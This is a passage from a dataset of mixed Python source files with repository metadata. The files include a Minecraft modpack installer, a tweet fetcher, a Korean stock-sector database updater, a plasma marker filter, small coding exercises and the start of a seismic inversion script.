version=\"*\"):\n res = self.db.search_projects(query, ptype, 25, version=version)\n return [CurseProject(i) for i in res]\n\n def download_file(self, url: str, filepath: str, fname=\"\", progf=False):\n \"\"\"Download a file from `url` to `filepath/name`\"\"\"\n r = self.session.get(url, stream=True)\n dlen = r.headers.get(\"content-length\")\n step = (100 / int(dlen))\n prog = 0\n if not fname:\n fname = unquote(Path(r.url).name)\n with open(filepath+\"/\"+fname, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n prog += len(chunk)\n if progf:\n progf(int(step * prog))\n f.write(chunk)\n if progf:\n progf(0)\n return filepath+\"/\"+fname\n\n def get(self, params={}, path=\"\", host=\"\", includeUrl=False):\n \"\"\"HTTP GET with HTML parsing\"\"\"\n if not host:\n host = self.baseUrl\n r = self.session.get(host + path, params=params)\n html = r.text\n if includeUrl:\n return [BeautifulSoup(html, \"html.parser\"), r.url]\n return BeautifulSoup(html, \"html.parser\")\n\n # END SECTION\n\n\nclass CurseProject:\n def __init__(self, meta: dict):\n self.meta = meta\n\n self.id = self.meta[\"id\"]\n\n self.type = self.meta[\"type\"]\n\n self.name = self.meta[\"title\"]\n self.author = self.meta[\"primaryAuthor\"]\n self.desc = self.meta[\"desc\"]\n\n self.page = self.meta[\"site\"]\n\n self.versions = self.meta[\"versions\"]\n self.files = self.meta[\"files\"]\n\n self.attachments = self.meta[\"attachments\"]\n if len(self.attachments) > 0:\n self.default_attachment = [i for i in self.attachments if i[\"default\"]][0]\n else:\n self.default_attachment = False\n\n\nclass CurseFile:\n def __init__(self, f: dict):\n self.f = f\n\n self.id = self.f[\"id\"]\n self.pub_time = self.f[\"date\"]\n self.versions = self.f[\"versions\"]\n\n self.deps = self.f[\"dependencies\"]\n\n self.dl = self.f[\"url\"]\n\n self.filename = self.f[\"filename\"]\n self.project = self.f[\"project\"]\n\n\nclass CurseModpack:\n \"\"\"Get information from a modpack\"\"\"\n\n from API.MultiMC import MultiMC\n\n def __init__(self, project: CurseProject, curse: CurseAPI, mmc: MultiMC):\n self.project = project\n self.curse = curse\n self.mmc = mmc\n\n self.installed = False\n\n if os.name == \"nt\":\n self.installLocation = \"{}\\\\instances\\\\{}\\\\\".format(self.mmc.path, self.project.name)\n else:\n self.installLocation = \"{}/instances/{}/\".format(self.mmc.path, self.project.name)\n\n self.mmc = mmc\n\n def install(self, file: CurseFile, prog_label, progbar_1, progbar_2, is_update=False):\n if is_update:\n print(\"WARNING: UPDATING IS STILL EXPERIMENTAL\")\n\n safe_name = self.project.name + \"\"\n for c in \"\\\\/:*?\\\"<>|\":\n safe_name = safe_name.replace(c, '')\n\n tempPath = \"{}/instances/_MMC_TEMP/{}\".format(self.mmc.path, safe_name)\n\n progbar_1(0)\n\n prog_label(translate(\"downloading.icon\"))\n\n if self.project.default_attachment:\n ft = self.project.default_attachment[\"url\"].split(\".\")[-1]\n self.curse.download_file(self.project.default_attachment[\"url\"], \"{}/icons\".format(self.mmc.path),\n \"{}.{}\".format(self.project.id, ft), progf=progbar_2)\n\n if os.path.exists(tempPath):\n rmtree(tempPath)\n\n # Create instance temp folder if doesn't exist\n if not os.path.exists(tempPath):\n os.makedirs(tempPath)\n\n progbar_1(5)\n\n prog_label(translate(\"downloading.data\"))\n\n packFile = self.curse.download_file(file.dl, tempPath, progf=progbar_2)\n\n # Unpack zip file\n zipf = ZipFile(packFile)\n zipf.extractall(\"{}/raw\".format(tempPath))\n zipf.close()\n\n # Delete ZIP file\n 
os.remove(packFile)\n\n # Parse Manifest\n manifest = ModpackManifest(\"{}/raw/manifest.json\".format(tempPath))\n\n # Overrides\n mcPath = \"{}/minecraft\".format(tempPath)\n\n if os.path.exists(\"{}/raw/overrides\".format(tempPath)):\n copytree(\"{}/raw/overrides\".format(tempPath), mcPath)\n else:\n os.makedirs(mcPath)\n\n # Make mods folder\n modPath = \"{}/mods\".format(mcPath)\n if not os.path.exists(modPath):\n os.makedirs(modPath)\n\n # Make Patches Folder\n patchPath = \"{}/patches\".format(tempPath)\n if not os.path.exists(patchPath):\n os.makedirs(patchPath)\n\n # Configure Instance\n instanceCfg = InstanceCfg(manifest.mcVersion, manifest.forgeVersion, self.project.name, icon=str(self.project.id))\n instanceCfg.write(\"{}/instance.cfg\".format(tempPath))\n\n # Configure Forge\n forgeCfg = ForgePatch(manifest.mcVersion, manifest.forgeVersion)\n forgeCfg.write(patchPath+\"/net.minecraftforge.json\")\n\n modlist = list()\n\n progbar_1(10)\n\n modf = (90 / len(manifest.mods))\n\n newPath = \"{}/instances/{}\".format(self.mmc.path, safe_name)\n\n ignore_files = list()\n\n if not is_update:\n while os.path.exists(newPath):\n newPath += \"_\"\n else:\n from API.MultiMC import MultiMCInstance\n inst = MultiMCInstance(newPath)\n\n nmds = [i[1] for i in manifest.mods]\n npids = [i[0] for i in manifest.mods]\n\n for mod in inst.mods:\n if mod[\"id\"] in nmds:\n ignore_files.append(mod[\"id\"])\n modlist.append(mod)\n elif not mod[\"manual\"] or self.curse.get_file(mod[\"id\"]).project in npids:\n inst.uninstall_mod(mod[\"path\"])\n else:\n modlist.append(mod)\n\n for x, mod in enumerate(manifest.mods):\n if mod[1] in ignore_files:\n continue\n #stdout.write(\"\\rDownloading mod {}/{}\".format(x+1, len(manifest.mods)))\n f = self.curse.get_file(mod[1])\n if not f:\n continue\n\n prog_label(translate(\"downloading.mod\").format(f.filename))\n progbar_1(10 + (x * modf))\n mpath = self.curse.download_file(f.dl, modPath, progf=progbar_2)\n modlist.append({\"id\": mod[1], \"path\": mpath.replace(tempPath, newPath), \"manual\": False})\n stdout.write(\"\\n\\r\")\n\n open(\"{}/omm_dat.json\".format(tempPath), \"w+\").write(dumps({\n \"file\": file.id,\n \"mods\": modlist\n }, indent=4))\n\n rmtree(\"{}/raw\".format(tempPath))\n\n if not os.path.exists(newPath):\n os.makedirs(newPath)\n moveTree(tempPath, newPath)\n if os.path.exists(tempPath):\n rmtree(tempPath)\n\n\nclass ModpackManifest:\n \"\"\"Parse a modpack's manifest.json\"\"\"\n def __init__(self, filename: str):\n self.filename = filename\n\n self.json = loads(open(self.filename).read())\n\n self.mcVersion = self.json[\"minecraft\"][\"version\"]\n self.forgeVersion = self.json[\"minecraft\"][\"modLoaders\"][0][\"id\"].replace(\"forge-\", '')\n\n self.mods = [[i[\"projectID\"], i[\"fileID\"]] for i in self.json[\"files\"]]\n\n\nclass SearchType:\n Mod = \"mc-mods\"\n Modpack = \"modpacks\"\n Texturepack = \"customiaztion\"\n","repo_name":"OpenMineMods/OpenMineMods","sub_path":"API/CurseAPI.py","file_name":"CurseAPI.py","file_ext":"py","file_size_in_byte":9419,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"72775105334","text":"#code before lecture\n\nstring=input()\nnum=\"0123456789\"\ncnt=0\nN=\"\"\nfor x in string:\n if x in num:\n N+=x\nN=int(N)\n\nfor i in range(1,N+1):\n if N%i==0:\n cnt+=1\n\nprint(N)\nprint(cnt)\n\n#code from lecture\ns=input()\nres=0\nfor x in s:\n if x.isdecimal():\n res=res*10+int(x)\nprint(res)\ncnt=0\nfor i in range(1,res+1):\n if res%i==0:\n 
cnt+=1\nprint(cnt)","repo_name":"JangAyeon/Algorithm","sub_path":"탐색&시뮬레이션/숫자만추출.py","file_name":"숫자만추출.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73366370612","text":"import sys\nimport datetime\nimport json\nimport os\nimport re\nimport time\nimport traceback\nimport argparse\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\nimport itertools\n\nimport backoff\nimport pandas as pd\n\nimport punisher.constants as c\nimport punisher.config as cfg\nfrom punisher.clients import s3_client\nfrom punisher.clients import twitter_client\nfrom punisher.utils.dates import str_to_date\nfrom punisher.utils.encoders import JSONEncoder\nimport punisher.utils.logger as logger_utils\n\n\nparser = argparse.ArgumentParser(description='Historical Tweet Fetcher')\nparser.add_argument('-q', '--query', help='Query in the format https://twitter.com/search-advanced', type=str)\nparser.add_argument('-s', '--start', help='start time yyyy-mm-dd', default=None, type=str)\nparser.add_argument('-e', '--end', help='end time yyyy-mm-dd', default=None, type=str)\nparser.add_argument('-m', '--max', help='Max tweets to pull each day', default=1000, type=int)\nparser.add_argument('-w', '--workers', help='number of workers in pool', default=1, type=int)\nparser.add_argument('-r', '--retries', help='max number of retries', default=15, type=int)\nparser.add_argument('--filter', help='Include only tweets w at least one like or retweet', action='store_true')\nparser.add_argument('--top', help='Include only tweets from Twitters \"top tweets\" list', action='store_true')\nparser.add_argument('--action', help='\"fetch\" from twitter, \"download\" from s3, or \"list\" files in S3',\n choices=['fetch','download', 'list'], required=True)\nparser.add_argument('--upload', help='upload to s3 after fetching from exchange', action='store_true')\nparser.add_argument('--cleanup', help='remove local copy of files after s3 upload', action='store_true')\nparser.add_argument('-o', '--outdir', help='output directory to save files', default=cfg.DATA_DIR, type=str)\nparser.add_argument('-l', '--lang', type=str, default='en',\n help=\"Set this flag if you want to query tweets in \\na specific language. 
You can choose from:\\n\"\n \"en (English)\\nar (Arabic)\\nbn (Bengali)\\n\"\n \"cs (Czech)\\nda (Danish)\\nde (German)\\nel (Greek)\\nes (Spanish)\\n\"\n \"fa (Persian)\\nfi (Finnish)\\nfil (Filipino)\\nfr (French)\\n\"\n \"he (Hebrew)\\nhi (Hindi)\\nhu (Hungarian)\\n\"\n \"id (Indonesian)\\nit (Italian)\\nja (Japanese)\\n\"\n \"ko (Korean)\\nmsa (Malay)\\nnl (Dutch)\\n\"\n \"no (Norwegian)\\npl (Polish)\\npt (Portuguese)\\n\"\n \"ro (Romanian)\\nru (Russian)\\nsv (Swedish)\\n\"\n \"th (Thai)\\ntr (Turkish)\\nuk (Ukranian)\\n\"\n \"ur (Urdu)\\nvi (Vietnamese)\\n\"\n \"zh-cn (Chinese Simplified)\\n\"\n \"zh-tw (Chinese Traditional)\"\n )\n# python -m punisher.data.tweet_fetcher --query \"bitcoin OR btc\" --start 2016-01-01\n# --end 2016-01-02 --lang en --max 10 --upload --top --filter --action fetch --cleanup\n\nargs = parser.parse_args()\nTWITTER = 'twitter'\nTWITTER_DIR = Path(args.outdir, TWITTER)\nTWITTER_DIR.mkdir(exist_ok=True)\nMAX_RETRIES = args.retries\n\ndef get_s3_path(query, lang, date):\n fname = twitter_client.get_tweet_query_fname(query, lang, date)\n query = query.replace(' ', '_')\n return TWITTER + '/' + query + '/' + fname\n\ndef upload_to_s3(query, lang, date):\n fpath = twitter_client.get_tweet_query_fpath(query, lang, date, TWITTER_DIR)\n s3_path = get_s3_path(query, lang, date)\n print('Uploading to s3:', s3_path)\n s3_client.upload_file(str(fpath), s3_path)\n\n@backoff.on_exception(backoff.expo,\n Exception, #TODO: include twitter exceptions only\n on_backoff=logger_utils.retry_hdlr,\n on_giveup=logger_utils.giveup_hdlr,\n max_tries=MAX_RETRIES)\ndef fetch_tweets(query, start, end, max_tweets, lang,\n filter_tweets, top_tweets, upload, cleanup):\n \"\"\"\n Downloads historical tweets from twitter in daily increments\n\n Parameters:\n query = 'bitcoin OR btc'\n start = datetime.datetime(year=2018, month=2, day=4)\n end = datetime.datetime(year=2018, month=2, day=6)\n \"\"\"\n time_delta = datetime.timedelta(days=1)\n cur_start = start\n while cur_start < end:\n cur_end = cur_start + time_delta\n print(\"Start\", cur_start, \"End\", cur_end)\n tweets = twitter_client.fetch_tweets(\n query, start, end, max_tweets, lang,\n filter_tweets, top_tweets\n )\n print(\"Downloaded\", len(tweets))\n twitter_client.save_query_tweets(tweets, query, lang, cur_start)\n if upload:\n upload_to_s3(query, lang, cur_start)\n if cleanup:\n fpath = twitter_client.get_tweet_query_fpath(query, lang, cur_start, TWITTER_DIR)\n os.remove(fpath)\n cur_start = cur_end\n\ndef download_from_s3(query, start_date):\n \"\"\" Download query files for all dates \"\"\"\n query = query.replace(' ', '_')\n prefix = TWITTER + '/' + query\n keys = s3_client.list_files(prefix=prefix)\n fpaths = []\n for key in keys:\n fpath = Path(TWITTER_DIR, query, Path(key).name)\n fpaths.append(fpath)\n print(\"Downloading from s3\", fpath)\n s3_client.download_file(str(fpath), key)\n\ndef list_files():\n keys = s3_client.list_files(pattern=TWITTER)\n reg = re.compile('twitter\\/([a-z0-9A-Z#\\$\\_]+)\\/([a-z0-9A-Z#\\$\\_]+)_(20[0-9]+)_([0-9]+)_([0-9]+).json')\n meta = {}\n for key in keys:\n m = re.match(reg, key)\n if m is not None:\n query, fname, year, month, day = m.groups()\n start = datetime.datetime(year=int(year), month=int(month), day=int(day))\n if query not in meta:\n meta[query] = {\n 'start': start,\n 'end': start + datetime.timedelta(days=1)\n }\n else:\n meta[query] = {\n 'start': min(start, meta[query]['start']),\n 'end': max(start+datetime.timedelta(days=1), meta[query]['end'])\n }\n return meta\n\ndef 
fetch_tweets_async(query, start, end, max_tweets, lang, filter_tweets,\n top_tweets, upload, cleanup, workers):\n days = (end - start).days\n start_dates = [start + datetime.timedelta(days=d) for d in range(days)]\n end_dates = [date + datetime.timedelta(days=1) for date in start_dates]\n with ThreadPoolExecutor(max_workers=workers) as executor:\n _ = executor.map(\n fetch_tweets, itertools.repeat(query), start_dates, end_dates,\n itertools.repeat(max_tweets), itertools.repeat(lang),\n itertools.repeat(filter_tweets), itertools.repeat(top_tweets),\n itertools.repeat(upload), itertools.repeat(cleanup)\n )\n\nif __name__ == \"__main__\":\n action = args.action\n start = str_to_date(args.start) if args.start is not None else None\n end = str_to_date(args.end) if args.end is not None else None\n\n if args.cleanup:\n assert args.upload is True\n if action == 'fetch':\n assert start is not None and end is not None\n\n if action == 'list':\n print('Listing files in S3')\n file_metadata = list_files()\n print(json.dumps(file_metadata, indent=4, cls=JSONEncoder))\n\n elif action == 'fetch':\n print('Fetching from twitter: ', args.query, 'start:', start, 'end:', end)\n if args.workers > 1:\n fetch_tweets_async(\n args.query, start, end, args.max, args.lang, args.filter,\n args.top, args.upload, args.cleanup, args.workers\n )\n else:\n fetch_tweets(\n args.query, start, end, args.max, args.lang,\n args.filter, args.top, args.upload, args.cleanup\n )\n\n elif action == 'download':\n print('Downloading from S3: ', args.query)\n download_from_s3(args.query, start)\n\n else:\n raise Exception(\"Action {:s} not supported!\".format(action))\n","repo_name":"bfortuner/punisher","sub_path":"punisher/data/tweet_fetcher.py","file_name":"tweet_fetcher.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"72942642293","text":"from django.contrib import admin\nfrom .models import *\n\n# Register your models here.\nclass SignupData(admin.ModelAdmin):\n #ordering=['id']\n list_display=['id','firstname','email']\n\nclass notesAdmin(admin.ModelAdmin):\n list_display=['title','option','file','comment']\n\n\n\nadmin.site.register(signup,SignupData)\nadmin.site.register(notes,notesAdmin)","repo_name":"rohitghatar/NotesApp","sub_path":"note_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2696332657","text":"\nfrom __future__ import print_function\nimport numpy as np\n#import matplotlib.pyplot as plt\ndef filter_marker(input_fname='input.particles', \\\n fname_out='input.particles_filt',\\\n minrho=0.8, minxi=-1., maxxi=1., sign=1, max_markers=30000, maxrho=5.):\n\n \"\"\" Filter markers\n\n Script to filter the input.particles file (useful for wall-losses studies) \n basing on rho and xi\n\n markers, markers_towrite, pitch, indnew = filter_marker.filter_marker(input_fname, \\\n fname_out, minrho, minxi, maxxi, sign, max_markers, max_rho)\n\n Parameters:\n | input_fname (str) : name of file to read (default input.particles)\n | fname_out (str) : name of file where to write (default input.particles_filt)\n | minrho (float) : minimum rho (particles will be chosen after this rho value)\\\n (default is 0.8)\n | minxi (float) : minimum pitch allowable (default is -1)\n | maxxi (float) : maximum pitch allowable (default is 1) \n \n Arguments:\n | markers_towrite (array) : matrix with data of 
markers selected\n | markers (array) : matrix with read data\n | pitch (array) : pitch of data to be written\n | indnew (array) : array with the indices of the selected markers\n \"\"\"\n\n fin = open(input_fname,\"r\")\n lines=fin.readlines()\n for ind, ll in enumerate(lines):\n tmpl = ll.split()\n if 'fields' in tmpl:\n nfields = int(tmpl[0])\n ind_countrho = ind\n elif 'particles' in tmpl:\n nmarkers = int(tmpl[0])\n ind_nmarkers = ind\n elif 'flux' in tmpl:\n indrho = ind-ind_countrho-1\n elif 'velocity' in tmpl:\n if 'toroidal' in tmpl:\n indvphi = ind-ind_countrho-1\n elif 'vertical' in tmpl:\n indvz = ind-ind_countrho-1\n elif 'radial' in tmpl:\n indvr = ind-ind_countrho-1\n elif 'weight' in tmpl:\n indweight = ind-ind_countrho-1\n elif 'magnetic' in tmpl:\n if 'toroidal' in tmpl:\n indBphi = ind-ind_countrho-1\n elif 'vertical' in tmpl:\n indBz = ind-ind_countrho-1\n elif 'radial' in tmpl:\n indBr = ind-ind_countrho-1\n\n try:\n float(tmpl[1])\n except:\n continue\n ind_markerstart = ind\n break\n \n header = lines[0:ind_markerstart-1]\n markers = np.zeros((nmarkers, nfields))\n for ind, ll in enumerate(lines[ind_markerstart:-1]):\n tmp = ll.split()\n markers[ind,:] = tmp[:]\n vtot = np.sqrt(markers[:, indvphi]**2+markers[:, indvz]**2+markers[:, indvr]**2)\n \n modB = np.sqrt(markers[:, indBphi]**2+markers[:, indBz]**2+markers[:, indBr]**2)\n vdotB = markers[:, indBphi]*markers[:, indvphi]+markers[:, indBz]*markers[:, indvz]+markers[:, indBr]*markers[:, indvr]\n pitch = vdotB/(modB*vtot)\n #vvparallel = vdotB/modB**2*[markers[:, indBphi], markers[:, indBz], markers[:, indBr]]\n #vparallel = np.sqrt(np.power(vvparallel[0,:],2)+np.power(vvparallel[1,:],2)+np.power(vvparallel[2,:],2))\n #pitch = sign*vparallel/vtot\n \n indnew = np.where(np.logical_and(np.logical_and(markers[:,indrho] > minrho, markers[:,indrho]minxi, pitch 0:\n gr1 = str('+' + gr1)\n else:\n gr1 = str(gr1)\n gr2 = round((price / data['Close'][-2] - 1) * 100, 2)\n gr2 = str(gr2) + '%'\n\n return str.upper(stock), round(price, 2), date, gr1, gr2\n\n# import time\n# start_time = time.time()\n# print(get_list_of_stock('poly'))\n# print(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"dzbarts/Financial-Analyser","sub_path":"CORE/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11777178164","text":"# 국내주식 크롤링 (Investar 참고)\n# 0. WICS 기준 섹터기준 분류\n# 1. 종목 정보 크롤링\n# 2. DB 생성 및 저장\n# 3. 
일별 자동생성\n\nimport pandas as pd\nfrom datetime import datetime\nimport pymysql\nimport calendar\nimport requests\nfrom threading import Timer\n\nclass DMDBUpdater:\n def __init__(self):\n self.conn = ''\n with self.conn.cursor() as curs:\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS stock_info (\n code VARCHAR(20),\n name VARCHAR(40),\n sector_l VARCHAR(20),\n sector_m VARCHAR(20),\n mktval BIGINT,\n wgt FLOAT,\n last_update DATE,\n PRIMARY KEY (last_update, code)\n )\n \"\"\"\n curs.execute(sql)\n self.conn.commit()\n self.codes = dict() # code_temp\n\n def get_sectors(self):\n sector = {1010: '에너지',\n 1510: '소재',\n 2010: '자본재',\n 2020: '상업서비스와공급품',\n 2030: '운송',\n 2510: '자동차와부품',\n 2520: '내구소비재와의류',\n 2530: '호텔,레스토랑,레저 등',\n 2550: '소매(유통)',\n 2560: '교육서비스',\n 3010: '식품과기본식료품소매',\n 3020: '식품,음료,담배',\n 3030: '가정용품과개인용품',\n 3510: '건강관리장비와서비스',\n 3520: '제약과생물공학',\n 4010: '은행',\n 4020: '증권',\n 4030: '다각화된금융',\n 4040: '보험',\n 4050: '부동산',\n 4510: '소프트웨어와서비스',\n 4520: '기술하드웨어와장비',\n 4530: '반도체와반도체장비',\n 4535: '전자와 전기제품',\n 4540: '디스플레이',\n 5010: '전기통신서비스',\n 5020: '미디어와엔터테인먼트',\n 5510: '유틸리티'}\n return sector\n\n def update_stock_info(self):\n date = '20211020'\n df = pd.DataFrame(columns=['code', 'name', 'sector_l', 'sector_m', 'mktval', 'wgt'])\n sector = self.get_sectors()\n for i, sec_code in enumerate(sector.keys()):\n response = requests.get('http://www.wiseindex.com/Index/GetIndexComponets?ceil_yn=0&''dt=' + date + '&sec_cd=G' + str(sec_code))\n if (response.status_code == 200):\n json_list = response.json()\n for json in json_list['list']:\n code = json['CMP_CD']\n name = json['CMP_KOR']\n sector_l = json['SEC_NM_KOR']\n sector_m = json['IDX_NM_KOR'][5:]\n mktval = json['MKT_VAL']\n wgt = json['WGT']\n df = df.append(\n {'code': code, 'name': name, 'sector_l': sector_l, 'sector_m': sector_m, 'mktval': mktval,'wgt': wgt}, ignore_index=True)\n with self.conn.cursor() as curs:\n sql = \"SELECT max(last_update) from stock_info\"\n curs.execute(sql)\n rs = curs.fetchone() # last_update\n today = datetime.today().strftime('%Y-%m-%d')\n if rs[0] == None or rs[0].strftime('%Y-%m-%d') < today:\n sql = \"DELETE FROM stock_info\"\n curs.execute(sql)\n self.conn.commit()\n for idx in range(len(df)):\n code = df.code.values[idx]\n name = df.name.values[idx]\n sector_l = df.sector_l.values[idx]\n sector_m = df.sector_m.values[idx]\n mktval = df.mktval.values[idx]\n wgt = df.wgt.values[idx]\n today = datetime.today().strftime('%Y-%m-%d')\n sql = f\"INSERT INTO stock_info (code, name, sector_l, sector_m, mktval, wgt, last_update) \" \\\n f\"VALUES ('{code}', '{name}', '{sector_l}','{sector_m}', '{mktval}', '{wgt}', '{today}')\"\n curs.execute(sql)\n tmnow = datetime.now().strftime('%Y-%m-%d %H:%M')\n print(f\"[{tmnow}] #{idx + 1:04d} INSERT INTO stock_info \" \\\n f\"VALUES ({code}, {name}, {today})\")\n self.conn.commit()\n\n def __del__(self):\n self.conn.close()\n\n def execute_daily(self):\n self.update_stock_info()\n tmnow = datetime.now()\n lastday = calendar.monthrange(tmnow.year, tmnow.month)[1]\n if tmnow.month == 12 and tmnow.day == lastday:\n tmnext = tmnow.replace(year=tmnow.year + 1, month=1, day=1,\n hour=17, minute=0, second=0)\n elif tmnow.day == lastday:\n tmnext = tmnow.replace(month=tmnow.month + 1, day=1, hour=17,\n minute=0, second=0)\n else:\n tmnext = tmnow.replace(day=tmnow.day + 1, hour=17, minute=0,\n second=0)\n tmdiff = tmnext - tmnow\n secs = tmdiff.seconds\n t = Timer(secs, self.execute_daily)\n print(\"Waiting for next update ({}) ... 
\".format(tmnext.strftime('%Y-%m-%d %H:%M')))\n t.start()\n\nif __name__ == '__main__':\n DMDBUpdater().execute_daily()","repo_name":"neusj47/database","sub_path":"DMDB_Updater.py","file_name":"DMDB_Updater.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41067097992","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:19:50 2019\n\n@author: Administrator\n\"\"\"\n\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nboston = datasets.load_boston();\nX = boston.data;\nY = boston.target;\nprint(X.shape)\nprint(boston)\n#plt.scatter(X['RM'],Y,color='blue')\n#plt.scatter(X['LSTAT'],Y,color='blue')","repo_name":"ivileey/python","sub_path":"other/项目一线性回归分析入门之波士顿房价预测.py","file_name":"项目一线性回归分析入门之波士顿房价预测.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34598202042","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nfrom backend import load_model, predict_custom\nimport streamlit as st\nfrom streamlit_webrtc import VideoTransformerBase, webrtc_streamer\n\nmodel = load_model(model_path='./20210711-162248-big-one.h5')\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\n\nclass VideoTransformer(VideoTransformerBase):\n\n def transform(self, frame):\n frame = frame.to_ndarray(format=\"bgr24\")\n h, w, c = frame.shape\n result = hands.process(frame)\n pred, conf = predict_custom(image=frame, model=model)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w\n y_min = h\n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n# cv2.rectangle(frame, (x_min, y_min), (x_max, y_max), (130, 255, 20), 5)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n frame = cv2.putText(frame, f\"{pred}, {conf}\", (x_min, y_min - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)\n \n return frame \n \n","repo_name":"Chiraagkv/ASL","sub_path":"webrtc.py","file_name":"webrtc.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"34421711148","text":"# -*- coding: utf-8 -*-\n# pylint: disable=missing-module-docstring\n\n# import...\n# ...from HydPy\nfrom hydpy.core import parametertools\n\n\nclass K(parametertools.Parameter):\n \"\"\"Storage coefficient [1/T].\n\n For educational purposes, the actual value of parameter |K| does\n not depend on the difference between the actual simulation time step and\n the actual parameter time step.\n \"\"\"\n\n NDIM, TYPE, TIME, SPAN = 0, float, None, (0.0, None)\n\n\nclass N(parametertools.Parameter):\n \"\"\"Number of storages [-].\"\"\"\n\n NDIM, TYPE, TIME, SPAN = 0, int, None, (1, None)\n\n def __call__(self, *args, **kwargs) -> None:\n super().__call__(*args, **kwargs)\n seqs = self.subpars.pars.model.sequences\n seqs.states.sv.shape = self.value\n seqs.fluxes.qv.shape = self.value\n","repo_name":"hydpy-dev/hydpy","sub_path":"hydpy/models/test/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} 
+{"seq_id":"42418405951","text":"# find all the possible permutations of a given array\n# Need to check why append is not working properly\ntempAns=[]\ndef permutations1(arr, index): \n if index==len(arr): \n tempAns.append(arr.copy()) \n return \n for i in range(index,len(arr)):\n arr[i],arr[index]=arr[index],arr[i] \n permutations1(arr, index+1)\n arr[i],arr[index]=arr[index],arr[i] \n return\n\npermutations1([1,2,3],0)\nprint(tempAns)\n\n# in built code\n# from itertools import permutations\n# for i in permutations(list('123')):\n# print(i)","repo_name":"Sachin0796/DSA","sub_path":"Recursion/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8424370327","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pl_analysis\", # Replace with your own username\n version=\"0.0.5\",\n author=\"Maximilian Grove\",\n author_email=\"m_grov01@uni-muenster.de\",\n description=\"Plasmon loss analysis by 2D - or 3D - (stack) images of EELS spectra\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mgrove-wwu/EELS-LL-image-fitting\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"mgrove-wwu/EELS-LL-image-fitting","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32740420791","text":"f = open('17-281.txt')\ns = f.readlines()\na = []\nfor i in s:\n a.append(int(i))\nsum7 = 0\nminsum = 10000\nk = 0\nfor j in range(len(a)):\n sum7 = oct(j)[2:].count('7') + sum7\nfor m in range(len(a)-1):\n if a[ m] > sum7 and a[m+1] > sum7:\n k += 1\n if a[ m] + a[m+1] < minsum:\n minsum = a[ m] + a[m+1]\nprint(k, minsum)","repo_name":"anastasu/17Zzadanie","sub_path":"5019.py","file_name":"5019.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9852410622","text":"import os\nimport torch\nfrom torchaudio.functional import biquad\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.signal import butter\nimport matplotlib.pyplot as plt\nimport deepwave\nfrom deepwave import scalar\n\n\ndef setup(rank, world_size):\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12355'\n\n # initialize the process group\n dist.init_process_group(\"nccl\", rank=rank, world_size=world_size)\n torch.cuda.set_device(rank)\n\n\ndef cleanup():\n dist.destroy_process_group()\n\n\n# Generate a velocity model constrained to be within a desired range\nclass Model(torch.nn.Module):\n def __init__(self, initial, min_vel, max_vel):\n super().__init__()\n self.min_vel = min_vel\n self.max_vel = max_vel\n self.model = torch.nn.Parameter(\n torch.logit((initial - min_vel) /\n (max_vel - min_vel))\n )\n\n def forward(self):\n return (torch.sigmoid(self.model) *\n (self.max_vel - self.min_vel) +\n self.min_vel)\n\n\nclass Prop(torch.nn.Module):\n def __init__(self, model, dx, 